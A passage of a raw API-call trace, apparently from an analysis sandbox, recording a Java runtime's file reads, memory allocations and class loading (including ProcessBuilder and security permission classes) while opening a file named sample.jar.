liDistanceToMove=0x3417cfd, lpNewFilePointer=0x208c990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c990*=54623485) returned 1 [0104.673] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c960, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c960*=0xa0, lpOverlapped=0x0) returned 1 [0104.673] malloc (_Size=0x20) returned 0x12221ae0 [0104.674] strlen (_Str="sun/net/www/URLConnection.class") returned 0x1f [0104.674] strcpy (in: _Dest=0x208cb10, _Source="sun/net/www/URLConnection.class" | out: _Dest="sun/net/www/URLConnection.class") returned="sun/net/www/URLConnection.class" [0104.674] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ed3fc, lpNewFilePointer=0x208c590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c590*=51303420) returned 1 [0104.674] ReadFile (in: hFile=0x134, lpBuffer=0x208c5e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c560, lpOverlapped=0x0 | out: lpBuffer=0x208c5e0*, lpNumberOfBytesRead=0x208c560*=0x1e, lpOverlapped=0x0) returned 1 [0104.675] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ed439, lpNewFilePointer=0x208c5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5f0*=51303481) returned 1 [0104.675] ReadFile (in: hFile=0x134, lpBuffer=0x1227f630, nNumberOfBytesToRead=0xdd6, lpNumberOfBytesRead=0x208c5c0, lpOverlapped=0x0 | out: lpBuffer=0x1227f630*, lpNumberOfBytesRead=0x208c5c0*=0xdd6, lpOverlapped=0x0) returned 1 [0104.675] free (_Block=0x12299040) [0104.676] free (_Block=0x1228e730) [0104.678] malloc (_Size=0x48) returned 0x1228e410 [0104.678] malloc (_Size=0xa0) returned 0x122ea270 [0104.678] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417cb3, lpNewFilePointer=0x208bf50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf50*=54623411) returned 1 [0104.678] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf20, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208bf20*=0xa0, lpOverlapped=0x0) returned 1 [0104.678] malloc (_Size=0x1d) returned 0x12221ea0 [0104.678] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ea4b5, lpNewFilePointer=0x208bb50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb50*=51291317) returned 1 [0104.678] ReadFile (in: hFile=0x134, lpBuffer=0x208bba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb20, lpOverlapped=0x0 | out: lpBuffer=0x208bba0*, lpNumberOfBytesRead=0x208bb20*=0x1e, lpOverlapped=0x0) returned 1 [0104.679] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ea4ef, lpNewFilePointer=0x208bbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbb0*=51291375) returned 1 [0104.679] ReadFile (in: hFile=0x134, lpBuffer=0x122805a0, nNumberOfBytesToRead=0x2f0d, lpNumberOfBytesRead=0x208bb80, lpOverlapped=0x0 | out: lpBuffer=0x122805a0*, lpNumberOfBytesRead=0x208bb80*=0x2f0d, lpOverlapped=0x0) returned 1 [0104.684] malloc (_Size=0x48) returned 0x1228e460 [0104.684] malloc (_Size=0xa0) returned 0x122ea270 [0104.684] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417c66, lpNewFilePointer=0x208d300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d300*=54623334) returned 1 [0104.684] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d2d0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d2d0*=0xa0, lpOverlapped=0x0) returned 1 [0104.684] malloc (_Size=0x20) returned 0x12221ae0 [0104.684] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e8970, lpNewFilePointer=0x208cf00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf00*=51284336) returned 1 [0104.684] ReadFile (in: hFile=0x134, lpBuffer=0x208cf50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ced0, lpOverlapped=0x0 | out: lpBuffer=0x208cf50*, lpNumberOfBytesRead=0x208ced0*=0x1e, lpOverlapped=0x0) returned 1 [0104.686] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e89ad, lpNewFilePointer=0x208cf60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf60*=51284397) returned 1 [0104.686] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1b08, lpNumberOfBytesRead=0x208cf30, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208cf30*=0x1b08, lpOverlapped=0x0) returned 1 [0104.688] malloc (_Size=0x48) returned 0x1228e410 [0104.688] malloc (_Size=0xa0) returned 0x122ea270 [0104.688] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417c1c, lpNewFilePointer=0x208d550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d550*=54623260) returned 1 [0104.688] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d520, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d520*=0xa0, lpOverlapped=0x0) returned 1 [0104.689] malloc (_Size=0x1d) returned 0x12221ea0 [0104.689] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e7617, lpNewFilePointer=0x208d150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d150*=51279383) returned 1 [0104.689] ReadFile (in: hFile=0x134, lpBuffer=0x208d1a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d120, lpOverlapped=0x0 | out: lpBuffer=0x208d1a0*, lpNumberOfBytesRead=0x208d120*=0x1e, lpOverlapped=0x0) returned 1 [0104.690] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e7651, lpNewFilePointer=0x208d1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1b0*=51279441) returned 1 [0104.690] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x131f, lpNumberOfBytesRead=0x208d180, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d180*=0x131f, lpOverlapped=0x0) returned 1 [0104.691] malloc (_Size=0x48) returned 0x1228e5a0 [0104.691] malloc (_Size=0xa0) returned 0x122ea270 [0104.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417bd0, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=54623184) returned 1 [0104.691] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d430*=0xa0, lpOverlapped=0x0) returned 1 [0104.691] malloc (_Size=0x1f) returned 0x12221ae0 [0104.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e7121, lpNewFilePointer=0x208d060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d060*=51278113) returned 1 [0104.691] ReadFile (in: hFile=0x134, lpBuffer=0x208d0b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d030, lpOverlapped=0x0 | out: lpBuffer=0x208d0b0*, lpNumberOfBytesRead=0x208d030*=0x1e, lpOverlapped=0x0) returned 1 [0104.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e715d, lpNewFilePointer=0x208d0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0c0*=51278173) returned 1 [0104.691] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x4ba, lpNumberOfBytesRead=0x208d090, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d090*=0x4ba, lpOverlapped=0x0) returned 1 [0104.694] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0104.694] malloc (_Size=0x800) returned 0x122f86c0 [0104.694] _wfullpath (in: _Buffer=0x122f86c0, _Path="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", _BufferCount=0x400 | out: _Buffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0104.694] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0104.694] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0104.695] wcslen (_String="C:\\Users") returned 0x8 [0104.695] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x208cc50 | out: lpFindFileData=0x208cc50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6f565a3d, cFileName="Users", cAlternateFileName="")) returned 0x426200 [0104.695] FindClose (in: hFindFile=0x426200 | out: hFindFile=0x426200) returned 1 [0104.695] wcslen (_String="Users") returned 0x5 [0104.695] wcslen (_String="C:\\Users\\RDhJ0CNFevzX") returned 0x15 [0104.695] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x208cc50 | out: lpFindFileData=0x208cc50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xc7f89674, ftLastAccessTime.dwHighDateTime=0x1d789c1, ftLastWriteTime.dwLowDateTime=0xc7f89674, ftLastWriteTime.dwHighDateTime=0x1d789c1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6f565a3d, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x425b40 [0104.695] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0104.695] wcslen (_String="RDhJ0CNFevzX") returned 0xc [0104.695] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0104.695] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x208cc50 | out: lpFindFileData=0x208cc50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4c24231, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x4c24231, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6f565a3d, cFileName="Desktop", cAlternateFileName="")) returned 0x425ba0 [0104.695] FindClose (in: hFindFile=0x425ba0 | out: hFindFile=0x425ba0) returned 1 [0104.696] wcslen (_String="Desktop") returned 0x7 [0104.696] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0104.696] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", lpFindFileData=0x208cc50 | out: lpFindFileData=0x208cc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820, dwReserved0=0x0, dwReserved1=0x6f565a3d, cFileName="sample.jar", cAlternateFileName="")) returned 0x425b40 [0104.696] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0104.696] wcslen (_String="sample.jar") returned 0xa [0104.696] free (_Block=0x122f86c0) [0104.696] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0104.697] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0104.697] malloc (_Size=0x5c) returned 0x1220f480 [0104.697] wcscpy (in: _Dest=0x1220f480, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", nBufferLength=0x9, lpBuffer=0x208d688, lpFilePart=0x208d680 | out: lpBuffer="", lpFilePart=0x208d680*=0x0) returned 0x29 [0104.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d420 | out: lpFileInformation=0x208d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820)) returned 1 [0104.697] free (_Block=0x1220f480) [0104.698] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0104.698] malloc (_Size=0x5c) returned 0x1220f800 [0104.698] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0104.698] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", nBufferLength=0x9, lpBuffer=0x208d688, lpFilePart=0x208d680 | out: lpBuffer="", lpFilePart=0x208d680*=0x0) returned 0x29 [0104.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d420 | out: lpFileInformation=0x208d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820)) returned 1 [0104.698] free (_Block=0x1220f800) [0104.701] strlen (_Str="java/io/FilePermissionCollection.class") returned 0x26 [0104.701] malloc (_Size=0x48) returned 0x1228eaf0 [0104.701] malloc (_Size=0xa0) returned 0x122ea270 [0104.701] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417b7c, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=54623100) returned 1 [0104.701] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d430*=0xa0, lpOverlapped=0x0) returned 1 [0104.701] malloc (_Size=0x27) returned 0x12221ea0 [0104.702] strlen (_Str="java/io/FilePermissionCollection.class") returned 0x26 [0104.702] strcpy (in: _Dest=0x208d5e0, _Source="java/io/FilePermissionCollection.class" | out: _Dest="java/io/FilePermissionCollection.class") returned="java/io/FilePermissionCollection.class" [0104.702] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e63e7, lpNewFilePointer=0x208d060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d060*=51274727) returned 1 [0104.702] ReadFile (in: hFile=0x134, lpBuffer=0x208d0b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d030, lpOverlapped=0x0 | out: lpBuffer=0x208d0b0*, lpNumberOfBytesRead=0x208d030*=0x1e, lpOverlapped=0x0) returned 1 [0104.705] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e642b, lpNewFilePointer=0x208d0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0c0*=51274795) returned 1 [0104.705] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xcf6, lpNumberOfBytesRead=0x208d090, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d090*=0xcf6, lpOverlapped=0x0) returned 1 [0104.706] free (_Block=0x12221ae0) [0104.706] free (_Block=0x1228e5a0) [0104.718] strlen (_Str="java/security/AllPermission.class") returned 0x21 [0104.718] malloc (_Size=0x48) returned 0x1228e870 [0104.718] malloc (_Size=0xa0) returned 0x122ea270 [0104.718] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417b2d, lpNewFilePointer=0x208d520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d520*=54623021) returned 1 [0104.719] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4f0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d4f0*=0xa0, lpOverlapped=0x0) returned 1 [0104.719] malloc (_Size=0x22) returned 0x12221ae0 [0104.719] strlen (_Str="java/security/AllPermission.class") returned 0x21 [0104.719] strcpy (in: _Dest=0x208d6a0, _Source="java/security/AllPermission.class" | out: _Dest="java/security/AllPermission.class") returned="java/security/AllPermission.class" [0104.719] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e60b2, lpNewFilePointer=0x208d120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d120*=51273906) returned 1 [0104.719] ReadFile (in: hFile=0x134, lpBuffer=0x208d170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0f0, lpOverlapped=0x0 | out: lpBuffer=0x208d170*, lpNumberOfBytesRead=0x208d0f0*=0x1e, lpOverlapped=0x0) returned 1 [0104.719] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e60f1, lpNewFilePointer=0x208d180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d180*=51273969) returned 1 [0104.719] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x2f6, lpNumberOfBytesRead=0x208d150, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d150*=0x2f6, lpOverlapped=0x0) returned 1 [0104.720] free (_Block=0x12221ea0) [0104.721] free (_Block=0x1228eaf0) [0104.727] strlen (_Str="java/security/UnresolvedPermission.class") returned 0x28 [0104.728] malloc (_Size=0x48) returned 0x1228e230 [0104.728] malloc (_Size=0xa0) returned 0x122ea270 [0104.728] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417ad7, lpNewFilePointer=0x208d520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d520*=54622935) returned 1 [0104.728] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4f0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d4f0*=0xa0, lpOverlapped=0x0) returned 1 [0104.728] malloc (_Size=0x29) returned 0x12298780 [0104.728] strlen (_Str="java/security/UnresolvedPermission.class") returned 0x28 [0104.728] strcpy (in: _Dest=0x208d6a0, _Source="java/security/UnresolvedPermission.class" | out: _Dest="java/security/UnresolvedPermission.class") returned="java/security/UnresolvedPermission.class" [0104.728] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e47d4, lpNewFilePointer=0x208d120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d120*=51267540) returned 1 [0104.728] ReadFile (in: hFile=0x134, lpBuffer=0x208d170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0f0, lpOverlapped=0x0 | out: lpBuffer=0x208d170*, lpNumberOfBytesRead=0x208d0f0*=0x1e, lpOverlapped=0x0) returned 1 [0104.730] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e481a, lpNewFilePointer=0x208d180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d180*=51267610) returned 1 [0104.731] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1898, lpNumberOfBytesRead=0x208d150, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d150*=0x1898, lpOverlapped=0x0) returned 1 [0104.738] free (_Block=0x12221ae0) [0104.738] free (_Block=0x1228e870) [0104.744] strlen (_Str="java/security/BasicPermissionCollection.class") returned 0x2d [0104.744] malloc (_Size=0x48) returned 0x1228ea50 [0104.744] malloc (_Size=0xa0) returned 0x122ea270 [0104.744] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417a7c, lpNewFilePointer=0x208d4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d4f0*=54622844) returned 1 [0104.744] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d4c0*=0xa0, lpOverlapped=0x0) returned 1 [0104.744] malloc (_Size=0x2e) returned 0x12298200 [0104.745] strlen (_Str="java/security/BasicPermissionCollection.class") returned 0x2d [0104.745] strcpy (in: _Dest=0x208d670, _Source="java/security/BasicPermissionCollection.class" | out: _Dest="java/security/BasicPermissionCollection.class") returned="java/security/BasicPermissionCollection.class" [0104.745] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e36f2, lpNewFilePointer=0x208d0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0f0*=51263218) returned 1 [0104.745] ReadFile (in: hFile=0x134, lpBuffer=0x208d140, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0c0, lpOverlapped=0x0 | out: lpBuffer=0x208d140*, lpNumberOfBytesRead=0x208d0c0*=0x1e, lpOverlapped=0x0) returned 1 [0104.789] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30e373d, lpNewFilePointer=0x208d150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d150*=51263293) returned 1 [0104.789] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1097, lpNumberOfBytesRead=0x208d120, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d120*=0x1097, lpOverlapped=0x0) returned 1 [0104.789] free (_Block=0x12298780) [0104.790] free (_Block=0x1228e230) [0104.795] malloc (_Size=0x183b) returned 0x122f86c0 [0104.801] strlen (_Str="java/lang/Object") returned 0x10 [0104.805] free (_Block=0x122f86c0) [0104.806] strlen (_Str="sun/launcher/LauncherHelper$FXHelper.class") returned 0x2a [0104.806] malloc (_Size=0x48) returned 0x1228f040 [0104.806] malloc (_Size=0xa0) returned 0x122ea270 [0104.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417769, lpNewFilePointer=0x208e770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e770*=54622057) returned 1 [0104.806] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e740, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208e740*=0xa0, lpOverlapped=0x0) returned 1 [0104.806] malloc (_Size=0x2b) returned 0x12298280 [0104.917] strlen (_Str="java/lang/Throwable") returned 0x13 [0104.919] strlen (_Str="java/lang/Exception") returned 0x13 [0104.920] strlen (_Str="java/util/Set") returned 0xd [0104.923] strlen (_Str="java/io/IOException") returned 0x13 [0104.923] strlen (_Str="java/io/IOException.class") returned 0x19 [0104.923] malloc (_Size=0x48) returned 0x1228e280 [0104.923] malloc (_Size=0xa0) returned 0x122ea270 [0104.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34164fe, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=54617342) returned 1 [0104.923] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cc90*=0xa0, lpOverlapped=0x0) returned 1 [0104.923] malloc (_Size=0x1a) returned 0x122fa3b0 [0105.089] strlen (_Str="java/io/OutputStream") returned 0x14 [0105.091] strlen (_Str="java/io/FileOutputStream") returned 0x18 [0105.093] strlen (_Str="java/lang/CharSequence") returned 0x16 [0105.094] strlen (_Str="java/security/NoSuchAlgorithmException") returned 0x26 [0105.095] strlen (_Str="java/security/NoSuchAlgorithmException.class") returned 0x2c [0105.095] malloc (_Size=0x48) returned 0x1228e460 [0105.095] malloc (_Size=0xa0) returned 0x122ea270 [0105.095] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33fb048, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=54505544) returned 1 [0105.095] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cc90*=0xa0, lpOverlapped=0x0) returned 1 [0105.095] malloc (_Size=0x2d) returned 0x12298540 [0105.246] strlen (_Str="java/lang/String") returned 0x10 [0105.250] strlen (_Str="java/lang/Void.class") returned 0x14 [0105.250] malloc (_Size=0x48) returned 0x1228e230 [0105.251] malloc (_Size=0xa0) returned 0x122ea270 [0105.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341746d, lpNewFilePointer=0x208e5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5c0*=54621293) returned 1 [0105.251] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e590, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208e590*=0xa0, lpOverlapped=0x0) returned 1 [0105.251] malloc (_Size=0x15) returned 0x122facf0 [0105.255] strlen (_Str="java/util/concurrent/ConcurrentHashMap$ForwardingNode.class") returned 0x3b [0105.255] malloc (_Size=0x48) returned 0x1228ed20 [0105.255] malloc (_Size=0xa0) returned 0x122ea270 [0105.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34174f4, lpNewFilePointer=0x208d0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0f0*=54621428) returned 1 [0105.255] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d0c0*=0xa0, lpOverlapped=0x0) returned 1 [0105.255] malloc (_Size=0x3c) returned 0x1228e280 [0105.263] strlen (_Str="java/lang/System") returned 0x10 [0105.266] strlen (_Str="java/lang/StringBuilder") returned 0x17 [0105.269] strlen (_Str="java/lang/ProcessBuilder") returned 0x18 [0105.270] strlen (_Str="java/lang/ProcessBuilder.class") returned 0x1e [0105.270] malloc (_Size=0x48) returned 0x1228e460 [0105.270] malloc (_Size=0xa0) returned 0x122ea270 [0105.270] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x332548b, lpNewFilePointer=0x208dcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcd0*=53630091) returned 1 [0105.270] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dca0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208dca0*=0xa0, lpOverlapped=0x0) returned 1 [0105.274] malloc (_Size=0x1f) returned 0x122f9fc0 [0105.282] strlen (_Str="java/lang/Class") returned 0xf [0105.284] strlen (_Str="sun/misc/Launcher$BootClassPathHolder.class") returned 0x2b [0105.284] malloc (_Size=0x48) returned 0x1228e730 [0105.284] malloc (_Size=0xa0) returned 0x122ea270 [0105.284] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341676f, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: 